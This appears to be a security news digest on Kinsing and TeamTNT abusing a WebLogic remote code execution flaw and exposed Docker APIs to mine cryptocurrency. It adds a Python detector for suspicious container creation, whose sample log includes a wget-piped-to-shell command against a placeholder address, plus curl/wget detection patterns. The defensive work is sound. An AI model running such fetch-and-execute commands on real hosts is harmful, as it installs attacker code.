Hackers Targeting WebLogic Servers and Docker APIs for Mining Cryptocurrencies
2022-09-16 10:58

Malicious actors such as Kinsing are taking advantage of both recently disclosed and older security flaws in Oracle WebLogic Server to deliver cryptocurrency-mining malware.

The Kinsing actors have also been involved in campaigns against container environments via misconfigured open Docker Daemon API ports to launch a crypto miner and subsequently spread the malware to other containers and hosts.

The latest wave of attacks entails the actor weaponizing CVE-2020-14882, a two-year-old remote code execution bug, against unpatched servers to seize control of the server and drop malicious payloads.

"TeamTNT has been scanning for a misconfigured Docker Daemon and deploying alpine, a vanilla container image, with a command line to download a shell script to a C2 server," Aqua Security researcher Assaf Morag said.

Two other attacks mounted by the group entail the exploitation of exposed Redis servers and misconfigured Docker APIs to deploy coin miners and Tsunami binaries.

TeamTNT's targeting of Docker REST APIs has been well-documented over the past year.
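As an added defender-side example (not code from the article, Aqua Security or either group described), the detector below flags Docker API container-create requests that match the pattern quoted above: a vanilla image such as alpine started with a command that fetches a script with curl or wget and hands it to a shell. The log record layout and the sample records are constructed; dockerd emits no such log itself, so the example assumes an API proxy or audit layer that records image, command and calling address.

```python
import json
import re

# Added example. The one-JSON-object-per-line record shape (api, remote, image,
# cmd) is an assumption standing in for whatever proxy or audit layer fronts the
# Docker daemon API; dockerd does not emit this itself.

VANILLA_IMAGES = {"alpine", "busybox"}   # images that carry no workload of their own
FETCH_RE = re.compile(r"\b(curl|wget)\b")
SHELL_RE = re.compile(r"(^|[\s|;&])(sh|bash|ash)(\s|$)")

def is_fetch_and_run(cmd):
    """True when a container command downloads something and hands it to a shell."""
    joined = " ".join(cmd) if isinstance(cmd, list) else str(cmd)
    return bool(FETCH_RE.search(joined) and SHELL_RE.search(joined))

def base_image(image):
    """Strip tag and digest so 'alpine:3.16' and 'alpine' compare equal."""
    return image.split("@")[0].split(":")[0]

def flag_container_creates(lines):
    """Return (remote, image, command) for every suspicious /containers/create."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        if rec.get("api") != "/containers/create":
            continue
        if base_image(rec.get("image", "")) in VANILLA_IMAGES and is_fetch_and_run(rec.get("cmd", [])):
            hits.append((rec.get("remote"), rec["image"], " ".join(rec["cmd"])))
    return hits

# Constructed sample records (RFC 5737 documentation addresses, not real hosts).
SAMPLE_LOG = """
{"api": "/containers/create", "remote": "203.0.113.7", "image": "alpine", "cmd": ["sh", "-c", "wget -qO- http://198.51.100.9/x.sh | sh"]}
{"api": "/containers/create", "remote": "10.0.0.5", "image": "nginx:1.23", "cmd": ["nginx", "-g", "daemon off;"]}
{"api": "/containers/create", "remote": "10.0.0.5", "image": "alpine:3.16", "cmd": ["sleep", "3600"]}
{"api": "/images/create", "remote": "203.0.113.7", "image": "alpine", "cmd": []}
"""

if __name__ == "__main__":
    for remote, image, cmd in flag_container_creates(SAMPLE_LOG.splitlines()):
        print(f"suspicious create from {remote}: image={image} cmd={cmd!r}")
```

Only the first sample record is flagged; the plain alpine container running sleep and the nginx workload pass, and the image pull is ignored because it is not a create call.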


News URL

https://thehackernews.com/2022/09/hackers-targeting-weblogic-servers-and.html

Related Vulnerability

Date: 2020-10-21
CVE: CVE-2020-14882
Title: Unspecified vulnerability in Oracle Weblogic Server
Description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console).
Attack vector: network, low complexity
Vendor: oracle
Risk: critical (9.8)

Related vendor

VENDOR LAST 12M #/PRODUCTS LOW MEDIUM HIGH CRITICAL TOTAL VULNS
Docker 24 0 19 36 20 75